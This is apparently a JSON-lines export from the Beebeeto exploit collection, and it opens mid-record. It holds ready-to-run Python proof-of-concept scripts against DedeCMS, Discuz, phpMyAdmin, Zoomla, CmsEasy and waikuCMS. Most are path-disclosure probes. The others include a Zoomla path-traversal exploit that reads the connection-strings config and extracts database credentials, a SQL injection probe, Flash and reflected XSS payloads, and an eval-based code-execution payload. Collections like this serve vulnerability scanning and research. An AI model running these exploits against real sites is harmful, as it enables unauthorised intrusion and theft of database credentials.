'tag': ['Dedecms\u4fe1\u606f\u6cc4\u9732', 'Dedecms\u7206\u8def\u5f84', '5.5\u8def\u5f84\u6cc4\u9732'],\r\n 'desc': 'N/A',\r\n 'references': ['http://www.myhack58.com/Article/html/3/62/2010/26804.htm',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n file_list = ['/plus/paycenter/alipay/return_url.php',\r\n '/plus/paycenter/cbpayment/autoreceive.php',\r\n '/plus/paycenter/nps/config_pay_nps.php',\r\n '/plus/task/dede-maketimehtml.php',\r\n '/plus/task/dede-optimize-table.php',]\r\n args['poc_ret']['file_path'] = []\r\n for filename in file_list:\r\n verify_url = args['options']['target'] + filename\r\n try:\r\n if args['options']['verbose']:\r\n print '[*] Requst URL: ' + verify_url\r\n req = urllib2.urlopen(verify_url)\r\n content = req.read()\r\n except:\r\n continue\r\n if '<b>Fatal error</b>:' in content and '.php</b>' in content:\r\n if 'on line <b>' in content:\r\n args['success'] = True\r\n args['poc_ret']['file_path'].append(verify_url)\r\n if not args['poc_ret']['file_path']:\r\n args['poc_ret'].pop('file_path')\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "DedeCms", "id": "poc-2014-0084", "layer4_protocol": null}
{"create_date": "2014-10-19 16:12:46", "name": "phpmyadmin /themes/darkblue_orange/layout.inc.php \u6cc4\u6f0f\u670d\u52a1\u5668\u7269\u7406\u8def\u5f84 POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u5c0f\u9a6c\u7532", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "phpmyadmin\u6f0f\u6d1e,\u7206\u7269\u7406\u8def\u5f84\u6f0f\u6d1e,/layout.inc.php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0083',\r\n 'name': 'phpmyadmin /themes/darkblue_orange/layout.inc.php \u6cc4\u6f0f\u670d\u52a1\u5668\u7269\u7406\u8def\u5f84 POC',\r\n 'author': '\u5c0f\u9a6c\u7532',\r\n 'create_date': '2014-10-19',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'phpmyadmin',\r\n 'vul_version': ['*'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['phpmyadmin\u6f0f\u6d1e', '\u7206\u7269\u7406\u8def\u5f84\u6f0f\u6d1e', '/layout.inc.php'],\r\n 'desc': 'phpmyadmin\u7206\u8def\u5f84\u65b9\u6cd5 weburl+phpmyadmin/themes/darkblue_orange/layout.inc.php',\r\n 'references': ['http://huaidan.org/archives/1642.html',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n paths = ['/', '/phpmyadmin/']\r\n payload = '/source/plugin/myrepeats/table/table_myrepeats.php'\r\n for path in paths:\r\n verify_url = args['options']['target'] + path + payload\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n try:\r\n req = urllib2.Request(verify_url)\r\n content = urllib2.urlopen(req).read()\r\n except:\r\n continue\r\n if 'getImgPath()' in content and 'Fatal error:' and 'on line' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n else:\r\n args['success'] = False\r\n return args\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "phpmyadmin\u7206\u8def\u5f84\u65b9\u6cd5 weburl+phpmyadmin/themes/darkblue_orange/layout.inc.php", "app_name": "PHPMyAdmin", "id": "poc-2014-0083", "layer4_protocol": null}
{"create_date": "2014-10-18 22:15:15", "name": "Discuz x2.5 /source/plugin/myrepeats/table/table_myrepeats.php \u6cc4\u6f0f\u670d\u52a1\u5668\u7269\u7406\u8def\u5f84 POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "tmp", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "Discuz\u6f0f\u6d1e,\u7206\u7269\u7406\u8def\u5f84\u6f0f\u6d1e,/table_myrepeats.php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0082',\r\n 'name': 'Discuz x2.5 /source/plugin/myrepeats/table/table_myrepeats.php \u6cc4\u6f0f\u670d\u52a1\u5668\u7269\u7406\u8def\u5f84 POC',\r\n 'author': '1024',\r\n 'create_date': '2014-10-18',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Discuz',\r\n 'vul_version': ['x2.5'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['Discuz\u6f0f\u6d1e', '\u7206\u7269\u7406\u8def\u5f84\u6f0f\u6d1e', '/table_myrepeats.php'],\r\n 'desc': 'N/A',\r\n 'references': ['http://www.2cto.com/Article/201211/171301.html',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target'] + '/source/plugin/myrepeats/table/table_myrepeats.php'\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if '<b>Fatal error</b>:' in content and '/table_myrepeats.php</b>' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "Discuz", "id": "poc-2014-0082", "layer4_protocol": null}
{"create_date": "2014-10-17 22:50:56", "name": "Discuz x2 /source/function/function_connect.php \u6cc4\u6f0f\u670d\u52a1\u5668\u7269\u7406\u8def\u5f84 POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "1024", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "Discuz\u6f0f\u6d1e,\u7206\u7269\u7406\u8def\u5f84\u6f0f\u6d1e,/function_connect.php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0076',\r\n 'name': 'Discuz x2 /source/function/function_connect.php \u6cc4\u6f0f\u670d\u52a1\u5668\u7269\u7406\u8def\u5f84 POC',\r\n 'author': '1024',\r\n 'create_date': '2014-10-17',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Discuz',\r\n 'vul_version': ['x2.0'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['Discuz\u6f0f\u6d1e', '\u7206\u7269\u7406\u8def\u5f84\u6f0f\u6d1e', '/function_connect.php'],\r\n 'desc': 'N/A',\r\n 'references': ['http://sebug.net/vuldb/ssvid-24254',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target'] + '/source/function/function_connect.php'\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if '<b>Fatal error</b>:' in content and '/function_connect.php</b>' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())\r\n", "desc": "N/A", "app_name": "Discuz", "id": "poc-2014-0076", "layer4_protocol": null}
{"create_date": "2014-10-17 17:00:37", "name": "Discuz X2.5 full Path Disclosure Vulnerability POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "1024", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "Discuz\u4fe1\u606f\u6cc4\u9732,Discuz\u7206\u8def\u5f84,X2.5\u8def\u5f84\u6cc4\u9732", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0075',\r\n 'name': 'Discuz X2.5 full Path Disclosure Vulnerability POC',\r\n 'author': '1024',\r\n 'create_date': '2014-10-17',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Discuz',\r\n 'vul_version': ['2.5'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['Discuz\u4fe1\u606f\u6cc4\u9732', 'Discuz\u7206\u8def\u5f84', 'X2.5\u8def\u5f84\u6cc4\u9732'],\r\n 'desc': '''\r\n Discuz! X2.5 /api.php\u6587\u4ef6\u4e2d\u7531\u4e8earray_key_exists\u4e2d\u7684\u7b2c\u4e00\u4e2a\u53c2\u6570\u53ea\u80fd\u4e3a\u6574\u6570\u6216\u8005\u5b57\u7b26\u4e32\uff0c\r\n \u5f53?mod[]=beebeeto\u65f6\uff0c$mod\u7c7b\u578b\u4e3aarray\uff0c\u4ece\u800c\u5bfc\u81f4array_key_exists\u4ea7\u751f\u9519\u8bef\u4fe1\u606f\u3002\r\n ''',\r\n 'references': ['http://www.cnseay.com/archives/2353',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n file_list = ['/api.php','/uc_server/control/admin/db.php','/install/include/install_lang.php']\r\n args['poc_ret']['file_path'] = []\r\n for filename in file_list:\r\n verify_url = args['options']['target'] + filename + '?mod[]=beebeeto'\r\n try:\r\n if args['options']['verbose']:\r\n print '[*] Requst URL: ' + verify_url\r\n req = urllib2.urlopen(verify_url)\r\n content = req.read()\r\n except:\r\n continue\r\n if 'Warning:' in content and 'array_key_exists():' in content:\r\n if '.php on line' in content:\r\n args['success'] = True\r\n args['poc_ret']['file_path'].append(verify_url)\r\n if not args['poc_ret']['file_path']:\r\n args['poc_ret'].pop('file_path')\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Discuz! X2.5 /api.php\u6587\u4ef6\u4e2d\u7531\u4e8earray_key_exists\u4e2d\u7684\u7b2c\u4e00\u4e2a\u53c2\u6570\u53ea\u80fd\u4e3a\u6574\u6570\u6216\u8005\u5b57\u7b26\u4e32\uff0c\u5f53?mod[]=beebeeto\u65f6\uff0c$mod\u7c7b\u578b\u4e3aarray\uff0c\u4ece\u800c\u5bfc\u81f4array_key_exists\u4ea7\u751f\u9519\u8bef\u4fe1\u606f\u3002", "app_name": "Discuz", "id": "poc-2014-0075", "layer4_protocol": null}
{"create_date": "2014-10-17 14:20:44", "name": "Zoomla 2.0 /User/UserZone/School/Download.aspx \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e Exploit", "level": "\u4e2d\u5371", "batchable": 1, "author": "root", "rank": 3, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "Zoomla\u6f0f\u6d1e,Arbitary File Download", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport math\r\nimport urllib\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0073',# \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n 'name': 'Zoomla 2.0 /User/UserZone/School/Download.aspx \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e Exploit', # \u540d\u79f0\r\n 'author': 'root', # \u4f5c\u8005\r\n 'create_date': '2014-10-17', # \u7f16\u5199\u65e5\u671f\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http', # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n 'port': [80], # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n 'layer4_protocol': ['tcp'], # \u8be5\u534f\u8bae\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Zoomla', # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n 'vul_version': ['2.0'], # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n 'type': 'Arbitary File Download ', # \u6f0f\u6d1e\u7c7b\u578b\r\n 'tag': ['Zoomla\u6f0f\u6d1e', 'Arbitary File Download', ], # \u6f0f\u6d1e\u76f8\u5173tag\r\n 'desc': 'Zoomla X2.0 has Arbitary File Download in /User/UserZone/School/Download.aspx.', # \u6f0f\u6d1e\u63cf\u8ff0\r\n 'references': ['N/A', # \u53c2\u8003\u94fe\u63a5\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n username = \"\"\r\n passwor = \"\"\r\n payload = \"/User/UserZone/School/Download.aspx?f=..\\..\\..\\Config\\ConnectionStrings.config\" \r\n verify_url = args['options']['target'] + payload\r\n response = urllib2.urlopen(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] GET DATA from: ' + verify_url\r\n html = response.read().decode('utf-8')\r\n data = re.compile('User ID=(.*?);Password=(.*?)\"').findall(html)\r\n username = data[0][0]\r\n password = data[0][1]\r\n if username and password :\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n args['poc_ret']['username'] = username\r\n args['poc_ret']['password'] = password\r\n return args\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())\r\n", "desc": "Zoomla X2.0 has Arbitary File Download in /User/UserZone/School/Download.aspx.", "app_name": "Zoomla", "id": "poc-2014-0073", "layer4_protocol": null}
{"create_date": "2014-10-16 17:24:01", "name": "DedeCMS 5.7 /wap.php SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "tmp", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "DedeCMS\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,/wap.php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0071',\r\n 'name': 'DedeCMS 5.7 /wap.php SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n 'author': 'tmp',\r\n 'create_date': '2014-10-16',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'DedeCMS',\r\n 'vul_version': ['5.7'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['DedeCMS\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', '/wap.php'],\r\n 'desc': 'DedeCMS 5.7 /wap.php \u6587\u4ef6sids\u53c2\u6570\u5728\u5f53action\u4e3alist\u65f6\u6ca1\u6709\u5408\u9002\u8fc7\u6ee4\uff0c\u5bfc\u81f4SQL\u6ce8\u5165\u6f0f\u6d1e\u3002',\r\n 'references': ['http://sebug.net/vuldb/ssvid-62607',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = \"/wap.php?action=list&id=392%20test\"\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if \"Error page: <font color='red'>/wap.php?action=list&id=392%20test</font>\" in content:\r\n if \"Error infos: You have an error in your SQL syntax;\" in content:\r\n if \"typeid in(392 test)\" in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "DedeCMS 5.7 /wap.php \u6587\u4ef6sids\u53c2\u6570\u5728\u5f53action\u4e3alist\u65f6\u6ca1\u6709\u5408\u9002\u8fc7\u6ee4\uff0c\u5bfc\u81f4SQL\u6ce8\u5165\u6f0f\u6d1e\u3002", "app_name": "DedeCms", "id": "poc-2014-0071", "layer4_protocol": null}
{"create_date": "2014-10-16 14:37:00", "name": "DedeCMS 5.7 /images/swfupload/swfupload.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u5c0f\u9a6c\u7532", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "DedeCMS\u6f0f\u6d1e,Flash XSS\u6f0f\u6d1e,swfupload.swf", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport md5\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0070',\r\n 'name': 'DedeCMS 5.7 /images/swfupload/swfupload.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n 'author': '\u5c0f\u9a6c\u7532',\r\n 'create_date': '2014-10-16',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'DedeCMS',\r\n 'vul_version': ['5.7'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['DedeCMS\u6f0f\u6d1e', 'Flash XSS\u6f0f\u6d1e', 'swfupload.swf'],\r\n 'desc': 'DedeCMS 5.7 /images/swfupload/swfupload.swf\u6587\u4ef6movieName\u53c2\u6570\u6ca1\u6709\u5408\u9002\u8fc7\u6ee4\uff0c\u5bfc\u81f4\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e\u3002',\r\n 'references': ['http://wooyun.org/bugs/wooyun-2010-038593',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n flash_md5 = \"3a1c6cc728dddc258091a601f28a9c12\"\r\n file_path = \"/images/swfupload/swfupload.swf\"\r\n verify_url = args['options']['target'] + file_path\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n md5_value = md5.new(content).hexdigest()\r\n if md5_value in flash_md5:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url + r'?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%221%22%29}}//'\r\n return args\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "DedeCMS 5.7 /images/swfupload/swfupload.swf\u6587\u4ef6movieName\u53c2\u6570\u6ca1\u6709\u5408\u9002\u8fc7\u6ee4\uff0c\u5bfc\u81f4\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e\u3002", "app_name": "DedeCms", "id": "poc-2014-0070", "layer4_protocol": null}
{"create_date": "2014-10-11 16:44:25", "name": "CmsEasy 5.5 /demo.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u5927\u5b69\u5c0f\u5b69", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "cmseasy,xss,\u53cd\u5c04\u578bXSS", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0063', # \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n 'name': 'CmsEasy 5.5 /demo.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC', # \u540d\u79f0\r\n 'author': '\u5927\u5b69\u5c0f\u5b69', # \u4f5c\u8005\r\n 'create_date': '2014-10-10', # \u7f16\u5199\u65e5\u671f\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http', # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n 'port': [80], # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n 'layer4_protocol': ['tcp'], # \u8be5\u534f\u8bae\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'cmseasy', # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n 'vul_version': ['<=5.5'], # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n 'type': 'Cross Site Scripting', # \u6f0f\u6d1e\u7c7b\u578b\r\n 'tag': ['cmseasy', 'xss', '\u53cd\u5c04\u578bXSS'], # \u6f0f\u6d1e\u76f8\u5173tag\r\n 'desc': 'cmseasy /demo.php\u6587\u4ef6\u5b58\u5728xss\u6f0f\u6d1e\u3002', # \u6f0f\u6d1e\u63cf\u8ff0\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2014-069363', # \u53c2\u8003\u94fe\u63a5\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target'] + \"/demo.php?time=alert('f4aa169c58007f317b2de0b73cecbd92')\"\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n request = urllib2.Request(verify_url)\r\n response = urllib2.urlopen(request)\r\n content = response.read()\r\n if \"time:alert('f4aa169c58007f317b2de0b73cecbd92'),\" in content:\r\n args['success'] = True\r\n args['poc_ret']['xss_url'] = verify_url\r\n return args\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())\r\n", "desc": "cmseasy /demo.php\u6587\u4ef6\u5b58\u5728xss\u6f0f\u6d1e\u3002", "app_name": "CmsEasy", "id": "poc-2014-0063", "layer4_protocol": null}
{"create_date": "2014-10-11 11:01:09", "name": "waikuCMD /index.php/Search.html \u4ee3\u7801\u6267\u884c\u6f0f\u6d1e POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "foxhack", "rank": 3, "port": null, "vul_type": "\u4ee3\u7801\u6267\u884c", "tag": "waikucms,\u4ee3\u7801\u6267\u884c,search.html", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0062',\r\n 'name': 'waikuCMD /index.php/Search.html \u4ee3\u7801\u6267\u884c\u6f0f\u6d1e POC',\r\n 'author': 'foxhack',\r\n 'create_date': '2014-10-11',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'waikucms',\r\n 'vul_version': ['*'],\r\n 'type': 'Code Execution',\r\n 'tag': ['waikucms', '\u4ee3\u7801\u6267\u884c', 'search.html'],\r\n 'desc': 'Search.html \u53c2\u6570 keyword\u4f1a\u5728\u4e00\u5b9a\u6761\u4ef6\u4e0b\u4f1a\u5e26\u5165eval\u51fd\u6570\uff0c\u6784\u9020\u4ee3\u7801\u53ef\u9020\u6210\u4ee3\u7801\u6267\u884c',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2010-048523',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n vul_url = args['options']['target']+'/index.php/search.html?keyword=%24%7B%40phpinfo%28%29%7D'\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + vul_url\r\n response = urllib2.urlopen(urllib2.Request(vul_url)).read()\r\n if '<title>phpinfo()</title>' in response:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = vul_url\r\n return args\r\n else:\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())\r\n", "desc": "Search.html \u53c2\u6570 keyword\u4f1a\u5728\u4e00\u5b9a\u6761\u4ef6\u4e0b\u4f1a\u5e26\u5165eval\u51fd\u6570\uff0c\u6784\u9020\u4ee3\u7801\u53ef\u9020\u6210\u4ee3\u7801\u6267\u884c", "app_name": "Other", "id": "poc-2014-0062", "layer4_protocol": null}
